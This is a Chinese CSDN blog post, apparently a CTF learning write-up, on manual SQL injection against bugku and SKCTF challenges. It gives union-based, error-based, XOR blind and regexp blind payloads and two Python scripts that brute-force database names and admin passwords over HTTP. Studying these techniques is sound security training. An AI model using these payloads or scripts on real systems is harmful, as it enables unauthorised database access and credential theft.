SQL注入学习

最新推荐文章于 2020-08-25 21:56:24 发布
最新推荐文章于 2020-08-25 21:56:24 发布
阅读量400 收藏 1
点赞数 1
分类专栏: WEB 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43627829/article/details/90056058
版权

SQL 注入

在晓得CTF已经有7个月了。。sql注入题都是sqlmap一把梭(一直咕咕咕,太羞耻了,终于要学一下手工注入了

普通手工简单注入大致流程

  1. 判断注入点,fuzz过滤
  2. 判断字段数
  3. 获取基本信息(数据库名称,表名,字段名)
0x01 bugku-成绩单

发现1'#正常返回,啥也没过滤,直接爆字段数,数据库名,表名,字段名

1' order by 4#		//获取字段数
5' union select database(),user(),version(),version()#		//获取数据库名称 skctf_flag
5' union select table_name,table_name,table_name,table_name from information_schema.tables where table_schema='skctf_flag'#		//获取表名	fl4g
5' union select column_name,column_name,column_name,column_name from information_schema.columns where table_name='fl4g'#	//获取字段名  skctf_flag
5' union select skctf_flag,skctf_flag,skctf_flag,skctf_flag from fl4g#		//获取内容

得到flag

0x02 这是一个神奇的神奇的登录框

1"发现有mysql报错,刚刚好看了利用报错注入(用普通注入也可以的

  1. 使用updatexml报错注入
1" and updatexml(1,concat(0x7e,database()),0)#		//数据库名称:bugkusql1
1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),0)#		//表名:flag1
1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='flag1' limit 0,1)),0)#		//字段名:flag1
1" and updatexml(1,concat(0x7e,(select flag1 from flag1 )),0)#		//ed6b28e684817d9efcaf802979e57ae

//使用extractvalue()报错
poload:1" and extractvalue(0,concat(0x7e,version()))#
//使用floor()报错
pyload:1" and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#
使用floor()报错注意最后会多出来一个1

盲注

常见盲注注入方式
异或(XOR)注入

payload:admin'^(ascii(mid(version()from(1)))>'1')^'1'='1'#
前面和后面语句都固定为真,只有中间不确定,整个payload的结果都由中间的结果决定

1^0^1 --> 0
1^1^1 --> 1

不需要and or (空格) ,
这里如果=被过滤还可以使用<>
如果过滤了注释符和%那就把最后一个单引号去掉^'1'='1

regexp注入

payload

order by盲注

payload

0x03 login3(SKCTF)

bp抓包,使用爆破模块fuzz一下过滤
在这里插入图片描述
发现^,<,>没被过滤,使用第一个异或盲注

import requests
url = 'http://123.206.31.85:49167/index.php'
str1 = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ {}+-*/=()"
req = requests.Session()
def databases():
    database = ""
    for j in range(40):
        for i in str1:
            post = {
                "username":"admin'^(ascii(mid(database()from({})))<>{})^('1'<'2')#".format(str(j),ord(i)),
                "password":"123"
            }
            # print(post)
            text = req.post(url,data=post).content.decode('utf-8')
            if "username does not exist!" in text:
                database+=str(i)
                print(database)
                break
            #print(text)
    print(database)
def password():
    passwd = ""
    for j in range(40):
        for i in str1:
            post = {
                "username": "admin'^(ascii(mid((password)from({})))<>{})^('1'<'2')#".format(str(j), ord(i)),
                "password": "123"
            }
            # print(post)
            text = req.post(url, data=post).content.decode('utf-8')
            if "username does not exist!" in text:
                passwd += str(i)
                print(passwd)
                break
            # print(text)
    print(passwd)
password()

在fuzz时发现infomation被过滤不能得到表名和字段名
通过admin'^(select(1)from(admin))^1#这个payload来撞表名
猜字段用admin'^(select(count(password))from(admin))^1#来撞表名

得到admin的密码的md5()

0x04 sql注入2(bugku)

与上一题类似,比上一题多过滤了#
所以payload改为admin'^(ascii(mid(database()from({})))<>{})^'1'='1

import requests
url = 'http://123.206.87.240:8007/web2/login.php'
str1 = ".1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ {}+-*/=()"
req = requests.Session()
def databases():
    database = ""
    for j in range(40):
        for i in str1:
            post = {
                "uname":"admin'^(ascii(mid(database()from({})))<>{})^'1'='1".format(str(j),ord(i)),
                "passwd":"123"
            }
            #print(post)
            text = req.post(url,data=post).content.decode('utf-8')
            #print(text)
            if "username error!!@_@" in text:
                database+=str(i)
                print(database)
                break
            #print(text)
    print(database)
def password():
    passwd = ""
    for j in range(40):
        for i in str1:
            post = {
                "uname": "admin'^(ascii(mid((passwd)from({})))<>{})^'1'='1".format(str(j), ord(i)),
                "passwd": "123"
            }
            # print(post)
            text = req.post(url, data=post).content.decode('utf-8')
            if "username error!!@_@" in text:
                passwd += str(i)
                print(passwd)
                break
            # print(text)
    print(passwd)

password

0' or (select database()regexp'{}{}$') or '1'='

0' or (select table_name from infomation.scheam.table where table.scheam='pikachu')regexp'a$'

0' or (select (select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1) regexp 'r$') 		//表名

0' or (select (select group_concat(column_name) from information_schema.columns where table_name='fiag' limit 1) regexp 'd$') or '1'='  	//字段名

0' or (select (select group_concat(fl$4g) from fiag limit 1) regexp 't$') or '1'='

得到admin的密码,打开输入ls

Dk-wiki
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超详细,手把手教你一次简单的SQL注入,不用任何工具,带你走进web安全的大门
weixin_55634477的博客
03-14 805
超详细,手把手教你一次简单的SQL注入,不用任何工具,带你走进web安全的大门 靶场网站,网站所有权在知识盒子 知识盒子 老套的题目:提取网站数据库中存储的数据(flag) 打开网页 首先嘛,实验一下网站的功能 简单查询功能 正常操作一下 输入相应提示1 得到正确的反馈信息 错误操作一下 错误的反馈信息 右键查看网页源代码,看有么有可用信息 这里,可以得到最有可能查询的字段名称 让我们试试推理一下网站最有可能的SQL语句 条件查询语句 select 相应字段不清楚 from 表不清楚 where
二、SQL注入学习
qq_43387510的博客
01-28 320
2.1、SQL注入原理 SQL注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 在解释型语言中,如果程序与用户进行交互。用户就可以构造特殊的输入来拼接到程序中执行,从而使得程序依据用户输入执行有可能存在恶意行为的代码。 例如: 在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。登录案
CTF解题-网安实验室(注入关)
道阻且长,行则将至。
09-03 4007
万能密码 【题目环境】 最简单的SQL注入 分值: 100 Tips:题目里有简单提示 通关地址 【解题过程】 查看网页源码,提示使用admin登录: 直接上万能密码——admin';#、admin' #、admin' or 1=1 #密码随便输,登录成功: ...
注入关
weixin_43245269的博客
06-29 657
注入关1 最简单的SQL注入 分值: 100 Tips题目里有简单提示 用户名:admin or '1=1' 密码:随意 成功! 注入关2 最简单的SQL注入(熟悉注入环境) 分值: 100 最简单的SQL注入 http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 or ‘1=1’ 获得flag。 -- 数字型注入点select * from 表名 where id=1 http://xxx
网络安全攻防实验室通关教程-注入关
热门推荐
黑面狐
10-19 1万+
网络安全实验室传送门: 地址:http://hackinglab.cn  第一题:最简单的SQL注入 查看网页源码,获取到提示,要登录admin 所以构造用户名  admin' or 'a'='a'#   密码随便填, 获取到flag 第2题:最简单的sql注入(熟悉环境) 查看网页源码获得提示参数id=1  是数字型注入 于是构造url    index.
SQL注入系统学习
Panacea
08-25 657
本次学习共分为十五课时,虽然之前学习过但是感觉并不系统,所以重新学习了一遍 1):sql注入基础 原理: 对用户输入的参数没有进行过滤或者过滤不严格导致语句与数据库进行交互,从而欺骗服务器执行恶意的SQL语句。 危害: 获得、篡改数据库信息,敏感信息泄露 2):注入分类 按照参数类型: 字符型、数字型 数字型 判断方式 ?id=1 and 1=1--+ true ?id=1 and 1=2--+ false 按照注入位置: GET注入、POST注入 根据结果反馈: 布尔盲注、时间盲注 3):get
SQL 注入天书.pdf
08-06
总的来说,《SQL注入天书》及配套的sqli-labs提供了全面的SQL注入学习路径,从基础到高级,从理论到实践,有助于安全专业人士和开发人员增强对这一重要安全威胁的理解和应对能力。通过深入学习和实践,可以有效地...
sql注入学习入门篇
12-16
SQL注入学习入门篇 SQL注入是一种常见的网络攻击手段,它能够让攻击者获取到网站的敏感信息,从而导致严重的安全隐患。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
网络安全实验室CTF—注入关 writeup
Senimo
08-02 2275
网络安全实验室CTF—注入关 writeup最简单的SQL注入最简单的SQL注入(熟悉注入环境)防注入到底能不能回显邂逅ErrorBased盲注SQL注入通用防护据说哈希后的密码是不能产生注入的 网络安全实验室CTF链接 最简单的SQL注入 最简单的SQL注入(熟悉注入环境) 防注入 到底能不能回显 邂逅 ErrorBased 盲注 SQL注入通用防护 据说哈希后的密码是不能产生注入的 ...
hackinglab.cn 注入关之一
r00tnb的博客
12-15 3779
题目: Tips题目里有简单提示. writeup: 第一关应该挺简单的。 点击题目地址进去,显示的是一个简单的登陆界面,还有一个验证码。 查看一下源代码,发现有一个提示: &lt;!-- Tips login as admin--&gt; 也就是说登录名已经告诉你了。 开始填写表单,登录名就写admin,密码随便填,验证码输入正确,等待返回结果是登录失败!预料之中,在登录名...
网安实验室CTF 注入篇
sinat_21923549的博客
03-15 2528
1.最简单的SQL注入 地址:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php 用户名输入 admin’ or ‘1’=’1 实现绕过。2.最简单的SQL注入(熟悉注入环境) 地址:http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e15
GEE数据集-高分辨率全球树冠高度地图(1 米)Meta 公司.pdf
最新发布
07-17
绘制植被结构图对于了解全球碳循环以及监测基于自然的气候适应和减缓方法至关重要。通过对这些数据的重复测量,可以观察现有森林的砍伐或退化情况、森林的自然再生以及农林业等可持续农业实践的实施情况。高空间分辨率的树冠高度和树冠投影面积评估对于监测碳通量和评估基于树木的土地利用也很重要,因为森林结构在空间上可能高度异质,特别是在农林系统中。极高分辨率的卫星图像(地面采样距离小于一米)使提取树木层面的信息成为可能,同时还能进行大尺度监测。本文介绍了第一份同时为多个次国家辖区制作的高分辨率树冠高度图。具体来说,我们为加利福尼亚州和圣保罗州制作了非常高分辨率的树冠高度地图,与之前基于哨兵/GEDI 的全球树冠高度地图的十米(10 米)分辨率相比,分辨率有了显著提高。这些地图是通过在 2017 年至 2020 年的 Maxar 图像上训练的自监督模型中提取特征,并根据航空激光雷达地图训练密集预测解码器生成的。我们还引入了一个后处理步骤,使用在 GEDI 观测数据上训练的卷积网络。我们利用预留验证激光雷达数据以及与其他遥感地图和实地收集的数据进行比较,对所提出的地图进行了评估,发现我们的模型产生的平均绝对

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值